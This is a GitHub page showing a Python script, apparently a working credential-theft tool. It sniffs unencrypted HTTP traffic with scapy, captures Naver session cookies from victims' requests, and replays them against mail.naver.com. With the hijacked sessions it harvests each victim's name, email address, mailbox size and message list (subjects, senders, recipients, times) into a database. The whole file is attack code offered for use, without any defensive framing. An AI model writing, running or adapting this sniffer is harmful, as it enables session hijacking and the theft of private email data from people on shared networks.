-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathnaver_mail_list_sniffer.py
177 lines (138 loc) · 5.33 KB
/
naver_mail_list_sniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
import datetime
import requests
from scapy.all import *
from db import *
naver_reg = re.compile("Host: (.*naver.com)\r\n")
redundance_remove = []
i = 0
def cookie_sniff(packet):
global naver_reg
global redundance_remove
global i
try:
if packet.haslayer("TCP"):
try:
byte_pkt = packet.getlayer("TCP").payload.load.decode()
except:
return
if len(naver_reg.findall(byte_pkt)) != 0:
cookie_start_idx = byte_pkt.find("Cookie: ")
if cookie_start_idx != -1:
cookie_end_idx = byte_pkt.find("\x0d\x0a", cookie_start_idx)
cookie = byte_pkt[cookie_start_idx : cookie_end_idx]
if cookie not in redundance_remove:
redundance_remove.append(cookie)
try:
COOKIE_HASH_TABLE = cookie_parsing(cookie)
mail_json_sniff(COOKIE_HASH_TABLE)
except:
pass
else:
return
except:
pass
def cookie_parsing(cookie):
COOKIE_HASH_TABLE = {}
cookie_list = cookie[8:].split()
for a_cookie in cookie_list:
spliter_idx = a_cookie.find("=")
cookie_name = a_cookie[:spliter_idx]
ddam = a_cookie.find(";") #;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
if ddam != -1:
cookie_value = a_cookie[spliter_idx + 1: -1]
else:
cookie_value = a_cookie[spliter_idx + 1:]
COOKIE_HASH_TABLE[cookie_name] = cookie_value
#sys.exit()
return COOKIE_HASH_TABLE
null = 0 # dummy value for json
true = 1 # dummy value for json
false = 1 # dummy value for json
SIZE_LIST = []
time_duplicate = {}
def mail_json_sniff(COOKIE_HASH_TABLE):
global time_duplicate
global SIZE_LIST
requer = requests.get("https://mail.naver.com", cookies=COOKIE_HASH_TABLE)
response = requer.content
json_mail = {}
json_start_idx = response.find(b"mInfo = $Json")
if json_start_idx != -1:
json_end_idx = response.find(b".toObject()")
json_mail = eval(response[json_start_idx + 14: json_end_idx - 1])
else:
return
user_name = json_mail['env']['userName']
#print(SIZE_LIST)
try:
time_duplicate[user_name]
except:
time_duplicate[user_name] = []
if user_name not in SIZE_LIST:
SIZE_LIST.append(user_name)
session = Session()
session.add(MailSize(json_mail['env']['userName'],
json_mail['env']['mailAddress'],
json_mail['folder']['humanReadable'],
json_mail['list']['folderName'],
json_mail['list']['unreadCount'],
json_mail['list']['totalCount']))
session.commit()
mail_data_list = json_mail['list']['mailData']
for mail in mail_data_list:
if mail['toList'][0]['name'] == '':
mail['toList'][0]['name'] = "None"
sent_time = datetime.datetime.fromtimestamp(mail['sentTime']) + datetime.timedelta(0, 0, 0, 0, 0, 16)
if sent_time not in time_duplicate[user_name]:
time_duplicate[user_name].append(sent_time)
session = Session()
session.add(MailList(json_mail['env']['userName'],
json_mail['env']['mailAddress'],
mail['subject'],
mail['toList'][0]['email'],
mail['toList'][0]['name'],
mail['from']['email'],
mail['from']['name'],
sent_time)
)
session.commit()
else:
pass
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Input Condition 'interface' or 'pcap'")
print("USAGE : %s Condition - interface or pcap" % sys.argv[0])
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 0))
ip = s.getsockname()[0]
print(ip)
if sys.argv[1] == "pcap":
filename = input("Input File Name : ")
now_path = os.path.dirname(os.path.abspath(__file__))
pcap_path = os.path.join(now_path, filename)
pcap = rdpcap(pcap_path)
for packet in pcap:
cookie_sniff(packet)
else:
# sniff(iface="wlan0", prn=cookie_sniff, filter="tcp port 80 and src host not " + ip)
sniff(iface=sys.argv[1], prn=cookie_sniff, filter="tcp port 80")
# sniff(iface = interface, prn = cookie_sniff ,filter = "tcp port 80 and src host not "+ip)
"""
json_mail['env']['userName']
json_mail['env']['mailAddress']
json_mail['folder']['humanReadable'] # humanreadable size(1.1GB)
json_mail['folder']['totalUnreadMail']
json_mail['list']['folderName']
json_mail['list']['unreadCount']
json_mail['list']['totalCount']
json_mail['list']['lastPage']
"""
"""
print(mail['subject']) # subject
print(mail['from']['email'])
print(mail['from']['name'])
print(mail['toList'][0]['email'])
print(mail['toList'][0]['name'])
print(mail['sentTime'])
"""